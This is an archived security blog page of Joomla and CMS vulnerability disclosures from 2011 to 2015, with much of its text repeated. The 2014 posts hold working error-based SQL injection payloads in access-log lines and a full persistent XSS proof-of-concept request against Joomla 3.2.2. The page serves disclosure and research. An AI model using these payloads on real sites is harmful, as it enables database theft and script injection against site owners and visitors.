(I wrote this as a 'note' in 14.12.2015 but in case that all information are already public,
below you will find proof of concept and little write-up for vulnerability described in this CVE.)
Showing posts with label Joomla. Show all posts
Showing posts with label Joomla. Show all posts
Sunday, 27 December 2015
Tuesday, 23 December 2014
[EN] Vulnerabilities in popular plugins - Joomla case
Hi,
during last few months I was involved in multiple pentests (webapps, infrastructures) in multiple countries. That's why I didn't post here anything new (almost since last May ;) ).
For all of you who want to talk with me (faster than via email), you can reach me also at twitter.
For all of you, who are watching my blog - I have something new for you. A little mini-art-series where I describing multiple (mostly SQL Injection) vulnerabilitiesin multiple popular plugins (this time for Joomla).
If you want more (for example also for other popular content management systems) feel free to write to me.
Comments, ideas are welcome as always.
Article is now available here.
And also at PacketStormSecurity too.
Enjoy ;)
during last few months I was involved in multiple pentests (webapps, infrastructures) in multiple countries. That's why I didn't post here anything new (almost since last May ;) ).
For all of you who want to talk with me (faster than via email), you can reach me also at twitter.
For all of you, who are watching my blog - I have something new for you. A little mini-art-series where I describing multiple (mostly SQL Injection) vulnerabilitiesin multiple popular plugins (this time for Joomla).
If you want more (for example also for other popular content management systems) feel free to write to me.
Comments, ideas are welcome as always.
Article is now available here.
And also at PacketStormSecurity too.
Enjoy ;)
Saturday, 3 May 2014
How I meet your Joomla 3.2.2 SQL Injection
In March this year I found that Joomla 3.2.2 with default data
installed is vulnerable to SQL Injection attack.
After few lines from log from April,
you should know how it was done.
root@poc:/var/log/apache2# tail -n 1 -f access.log
10.149.14.63 - - [23/Apr/2014:22:32:44 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6661 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+0%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6727 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+1%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6745 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+2%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+3%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6748 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+4%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+5%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6739 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+6%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6754 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+7%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+8%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6760 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+9%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:29.0) Gecko/20100101 Firefox/29.0"
Why I decide to publish it. And here you will find even more.
Enjoy
o/
installed is vulnerable to SQL Injection attack.
After few lines from log from April,
you should know how it was done.
root@poc:/var/log/apache2# tail -n 1 -f access.log
10.149.14.63 - - [23/Apr/2014:22:32:44 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6661 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+0%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6727 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+1%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6745 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+2%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+3%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6748 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+4%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+5%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6739 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+6%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6754 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+7%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+8%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6760 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+9%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:29.0) Gecko/20100101 Firefox/29.0"
 | ||
| Joomla 3.2.2 error |
Why I decide to publish it. And here you will find even more.
Enjoy
o/
Monday, 3 March 2014
[EN] Joomla 3.2.2 pre-auth persistent XSS
Maybe you want to verify... ;)
# ==============================================================
# Title ...| Persistent pre-auth XSS in Joomla
# Version .| Joomla 3.2.2
# Date ....| 3.03.2014
# Found ...| HauntIT Blog
# Home ....| http://www.joomla.org
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/cms/joomla/index.php/single-contact HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 288
jform%5Bcontact_name%5D=aaaaaa&jform%5Bcontact_email%5D=a"><body%20onload=alert(123)>@b.com&jform%5Bcontact_subject%5D=asdas&jform%5Bcontact_message%5D=dasdasdasd&jform%5Bcontact_email_copy%5D=1&option=com_contact&task=contact.submit&return=&id=1%3Aname&e328236e3b63be0be16a0d0d841f63f9=1
---<request>---
And:
---<response>---
(...)
title="<strong>Email</strong><br />Email for contact">Email<span class="star"> *</span></label></div>
<div class="controls"><input type="email" name="jform[contact_email]" class="validate-email" id="jform_contact_email" value="a"><body onload=alert(123)>@b.com" size="30" required aria-required="true" /></div>
</div>
(...)
---<response>---
From Burp it looks like this:
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
# ==============================================================
# Title ...| Persistent pre-auth XSS in Joomla
# Version .| Joomla 3.2.2
# Date ....| 3.03.2014
# Found ...| HauntIT Blog
# Home ....| http://www.joomla.org
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/cms/joomla/index.php/single-contact HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 288
jform%5Bcontact_name%5D=aaaaaa&jform%5Bcontact_email%5D=a"><body%20onload=alert(123)>@b.com&jform%5Bcontact_subject%5D=asdas&jform%5Bcontact_message%5D=dasdasdasd&jform%5Bcontact_email_copy%5D=1&option=com_contact&task=contact.submit&return=&id=1%3Aname&e328236e3b63be0be16a0d0d841f63f9=1
---<request>---
 |
| Joomla XSS - request |
And:
---<response>---
(...)
title="<strong>Email</strong><br />Email for contact">Email<span class="star"> *</span></label></div>
<div class="controls"><input type="email" name="jform[contact_email]" class="validate-email" id="jform_contact_email" value="a"><body onload=alert(123)>@b.com" size="30" required aria-required="true" /></div>
</div>
(...)
---<response>---
From Burp it looks like this:
 |
| XSS - view from Burp |
Response at the page:
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
Thursday, 20 December 2012
[EN] Joomla 3.0.2 leaked again
Joomla 3.0.2 is vulnerable to sql leak.
If user supplied malformed data to cookie (by adding a value to md5 string), then
sql leak is possible and Joomla's table names prefix can be read.
... and now you can see an error from <prefix>_session table:
:)
If you watch this request/response you will see that those screens was created from 'administrators' link. To stop comments like 'not usefull because possible from admin' - try to reproduce this from normal (registered) or pre-auth user. ;)
Another place where user can input malformed data, looks like this:
cheers
If user supplied malformed data to cookie (by adding a value to md5 string), then
sql leak is possible and Joomla's table names prefix can be read.
 |
| Add 'malformed' value here - Burp |
... and now you can see an error from <prefix>_session table:
 | |
| SQL Leak - now you know what is the prefix |
:)
If you watch this request/response you will see that those screens was created from 'administrators' link. To stop comments like 'not usefull because possible from admin' - try to reproduce this from normal (registered) or pre-auth user. ;)
Another place where user can input malformed data, looks like this:
 | |
| SQL Leak |
cheers
Sunday, 3 June 2012
[EN] Joomla 2.5.4 - remote user logout bug
Yes, that seems to be, that in (still) latest Joomla (2.5.4) we have a so-called-bug.
By sending malformed request to the user, we are able to "logout" him.
Why this could be used for attack? So, badguy, can change (deface) your companys site,
and add there a password-stealer (to php code for example).
Now he can logout all users like a sniper. ;]
(Yes yes, there is a way from admin panel to do the same, but who cares...? ;))
I want finish some test right now, and for a few hours there will be update here.
...and thanks for watching at all-this-break ;)
Cheers o/
;)
By sending malformed request to the user, we are able to "logout" him.
Why this could be used for attack? So, badguy, can change (deface) your companys site,
and add there a password-stealer (to php code for example).
Now he can logout all users like a sniper. ;]
(Yes yes, there is a way from admin panel to do the same, but who cares...? ;))
I want finish some test right now, and for a few hours there will be update here.
...and thanks for watching at all-this-break ;)
Cheers o/
;)
Monday, 30 April 2012
[EN] Joomla 2.5.4 "SQL Info leak"
Ok,
so maybe You have 'display_errors=On' (or sth... still) on Your site...
So try this at Your localhost:
so maybe You have 'display_errors=On' (or sth... still) on Your site...
So try this at Your localhost:
It's important to mention that if You ('attacker') get this error,
You (he is) are able to view 'randomed' Joomla-prefixes for some names.
Look at screen in JOIN query.
Cheers! o/
Monday, 23 April 2012
[EN] Quick news
Hi,
today only one "quick news" ;)
Those information will be here as soon as possible, but for "Your information"
(and for "maybe this version is 'version of Your CMS' and You need quick-patch";))
here are listed few vulnerabilities I found this month.
If You need it fast- let me know, as always, via e-mail;)
So:
For (now ;)) 04.2012:
01.04 -Joomla 2.5.3 Information disclosure
04.04 -JooDatabase SQL Injection
06.04 -VirtueMart 2.0.2 Information disclosure
07.04 -jNews - Information disclosure
07.04 -Joomla 2.5.4 - Multiple...
07.04 -nBill Lite - HTML Injection / XSS
07.04 -VirtueMart 2.0.2 Information disclosure
11.04 -eFront CMS 3.6.10 Information disclosure
11.04 - eFront CMS 4.6.10 - User enumeration
14.04 -ATutor 2.0.4 XSS
15.04 -Docebo LMS 3605 - HTML Injection
15.04 - Docebo LMS 3605 - SQL Injection
16.04 -e107 - reflected XSS
18.04 - HikaShop - Information disclosure
...to be continued... ;)
For 03.2012:
29.03 - gpEasy 2.3.3 XSS
27.03 - eXtreme-fusion 4.5 XSS
26.03 - Joomla 2.5.3 few XSS
25.03 - Quick Cart 5.0 Information disclosure
25.04 - Quick Cart 5.0 CMS XSS
25.04 - Yaqas CMS (Alpha1) - multiple...
18.03 - Quick Cart 5.0 Information disclosure
18.03 - Quick CMS 4.0 XSS
So if You will find here any CMS that You are using right now - let me know
if You want test/patch it.
today only one "quick news" ;)
Those information will be here as soon as possible, but for "Your information"
(and for "maybe this version is 'version of Your CMS' and You need quick-patch";))
here are listed few vulnerabilities I found this month.
If You need it fast- let me know, as always, via e-mail;)
So:
For (now ;)) 04.2012:
01.04 -Joomla 2.5.3 Information disclosure
04.04 -JooDatabase SQL Injection
06.04 -VirtueMart 2.0.2 Information disclosure
07.04 -jNews - Information disclosure
07.04 -Joomla 2.5.4 - Multiple...
07.04 -nBill Lite - HTML Injection / XSS
07.04 -VirtueMart 2.0.2 Information disclosure
11.04 -eFront CMS 3.6.10 Information disclosure
11.04 - eFront CMS 4.6.10 - User enumeration
14.04 -ATutor 2.0.4 XSS
15.04 -Docebo LMS 3605 - HTML Injection
15.04 - Docebo LMS 3605 - SQL Injection
16.04 -e107 - reflected XSS
18.04 - HikaShop - Information disclosure
...to be continued... ;)
For 03.2012:
29.03 - gpEasy 2.3.3 XSS
27.03 - eXtreme-fusion 4.5 XSS
26.03 - Joomla 2.5.3 few XSS
25.03 - Quick Cart 5.0 Information disclosure
25.04 - Quick Cart 5.0 CMS XSS
25.04 - Yaqas CMS (Alpha1) - multiple...
18.03 - Quick Cart 5.0 Information disclosure
18.03 - Quick CMS 4.0 XSS
So if You will find here any CMS that You are using right now - let me know
if You want test/patch it.
Tuesday, 10 April 2012
[EN] VirtueMart 2.0.2 Bugs - UPDATED!
Ok. :] (According to this;))
I just found some informations about "possible sql injection" in latest VirtueMart (2.0.2).
So yes, it is true. ;) But I'm not the author of 'public' ;D So I asked myt self how it was happened... ;]
Why I decide to write this here. I found this vulnerability in 5.04 this year, and now I saw that someone is public it (the same) at 6.04 ;)
So that's why I want to share with You a full detailed technical information about this "possibility".
(...)
Anyway, beside SQL-i, in VM there are some kind of other vulnerabilities. I'm talking about information disclosure bugs.
If user submit a 'wrong url' then (because of wrong validation) he can get /path/to/your/virtuemart.
This information can be usable to other (extend) attacks.
This is my first post here, so if I found an 'add image' option, I will paste it some screens.
Cheers! ;)
Jakub"
Details below:
1. Attacker can get information from database.
2. Some information disclosure bugs:
(2.1 "Brute" input)
And output:
3. SQL Injection *tmp* screens:
I just found some informations about "possible sql injection" in latest VirtueMart (2.0.2).
So yes, it is true. ;) But I'm not the author of 'public' ;D So I asked myt self how it was happened... ;]
Why I decide to write this here. I found this vulnerability in 5.04 this year, and now I saw that someone is public it (the same) at 6.04 ;)
So that's why I want to share with You a full detailed technical information about this "possibility".
(...)
Anyway, beside SQL-i, in VM there are some kind of other vulnerabilities. I'm talking about information disclosure bugs.
If user submit a 'wrong url' then (because of wrong validation) he can get /path/to/your/virtuemart.
This information can be usable to other (extend) attacks.
This is my first post here, so if I found an 'add image' option, I will paste it some screens.
Cheers! ;)
Jakub"
Details below:
1. Attacker can get information from database.
2. Some information disclosure bugs:
(2.1 "Brute" input)
3. SQL Injection *tmp* screens:
And last screen for "when did I found it":
Cheers! ;)
Saturday, 7 April 2012
[EN] SQL Injection in JooDatabase 1.7
Yes, 'the same' like that I found for VirtueMart few hours ago.
By the way:
this post is only 'information' because I talked with Author and new version will be very very soon! :D
Good and fast "Response Team", I like it ;]
Check it out here: http://joodb.feenders.de/download.html
By the way:
this post is only 'information' because I talked with Author and new version will be very very soon! :D
Good and fast "Response Team", I like it ;]
Check it out here: http://joodb.feenders.de/download.html
Wednesday, 4 April 2012
Wednesday, 28 March 2012
[EN] Joomla 2.5.3 XSS
Yes, it's true. But for more informations You must wait until Joomla Security Team release update ;)
For this time, this bug will be used only in new projects - as always ;)
Questions here ;)
Friday, 2 March 2012
[PL] Blog Pawła - dzięki! ;)
Pewnego popołudnia dostałem wiadomość na jednym z portali, czy przypadkiem informacje z
Joomla-newslettera to "moja sprawka"... :>
Ogólnie bardzo miła niespodzianka, zwłaszcza, że autor postanowił
wspomnieć o tym na swoim blogu - co uważam za "komplement" - dzięki! ;)
Więcej informacji znajdziecie tutaj: http://blog.elimu.pl/
Joomla-newslettera to "moja sprawka"... :>
Ogólnie bardzo miła niespodzianka, zwłaszcza, że autor postanowił
wspomnieć o tym na swoim blogu - co uważam za "komplement" - dzięki! ;)
Więcej informacji znajdziecie tutaj: http://blog.elimu.pl/
Friday, 3 February 2012
Joomla Disclosure (finally updated;))
Last days I wrote few notes about Joomla Security.
Few minutes ago one of You send me a nice information
about "my finding" ;P
Like I saw, someone find "Joomla XSS" before me, so
"mine" are only "information disclosure" bugs listed.
Good. :)
So... Let's install latest Joomla! ;)
Once again: big thanks to Joomla Security Team.
For response. For knowledge. For patient.
Cheers!
Few minutes ago one of You send me a nice information
about "my finding" ;P
Like I saw, someone find "Joomla XSS" before me, so
"mine" are only "information disclosure" bugs listed.
Good. :)
So... Let's install latest Joomla! ;)
Once again: big thanks to Joomla Security Team.
For response. For knowledge. For patient.
Cheers!
Tuesday, 31 January 2012
Thank You Joomla Security Team
Hi,
I should write here a little more, but maybe soon...
Now I can tell You about Joomla Security Team: they are fast and full-of-knowledge! ;)
Watch them, soon there will be new release.
Best regards!
I should write here a little more, but maybe soon...
Now I can tell You about Joomla Security Team: they are fast and full-of-knowledge! ;)
Watch them, soon there will be new release.
Best regards!
Wednesday, 4 January 2012
[UPDATE] Joomla 1.7 Vulnerable to XSS
Lets start Happy New Year by some reflection...
Reflection as "reflected XSS" in latest Joomla (1.7.3 for this post).
Scenario of this attack is quite simple: attacker must build file with XSS and send it to Victim.
For reflected XSS when we are talking about Admin and Users, situation could be like this:
- (mail to admin) hi admin, this is my file.html, could it be added to my Joomla Profile? (... or what ever else...;) )
- wait, I must check it...
(...) and here is when admin or other user could be exploited by this reflected XSS.
What do You think: Should it be public? :D
UPDATE: (10.01.2012):
As there is a nice example of how reflected XSS could be devastating, I present You
link to PoC I found here (it is well known polish portal about security and IT, enjoy!).
Pastebin link is example of what Aditya Modha and Samir Shah found in WordPress 3.3.
Nice work! ;)
(more -> soon... ;) )
Reflection as "reflected XSS" in latest Joomla (1.7.3 for this post).
Scenario of this attack is quite simple: attacker must build file with XSS and send it to Victim.
For reflected XSS when we are talking about Admin and Users, situation could be like this:
- (mail to admin) hi admin, this is my file.html, could it be added to my Joomla Profile? (... or what ever else...;) )
- wait, I must check it...
(...) and here is when admin or other user could be exploited by this reflected XSS.
What do You think: Should it be public? :D
UPDATE: (10.01.2012):
As there is a nice example of how reflected XSS could be devastating, I present You
link to PoC I found here (it is well known polish portal about security and IT, enjoy!).
Pastebin link is example of what Aditya Modha and Samir Shah found in WordPress 3.3.
Nice work! ;)
(more -> soon... ;) )
Sunday, 30 October 2011
What's with Joomla 1.7.2 Stable?
Yesterday I was checking new Joomla CMS and when I login as an admin I found something "not correct" ;)
--- textarea ---
http://localhost/www/joomla/administrator/index.php?option=com_config&view=we have something here:
Joomla!
500 - An error has occurred.
View not found [name, type, prefix]: wehavesomethinghere, html, configView
Return to Control Panel
--- textarea ---
Will be updated... ;)
--- textarea ---
http://localhost/www/joomla/administrator/index.php?option=com_config&view=we have something here:
Joomla!
500 - An error has occurred.
View not found [name, type, prefix]: wehavesomethinghere, html, configView
Return to Control Panel
--- textarea ---
Will be updated... ;)
Subscribe to:
Comments (Atom)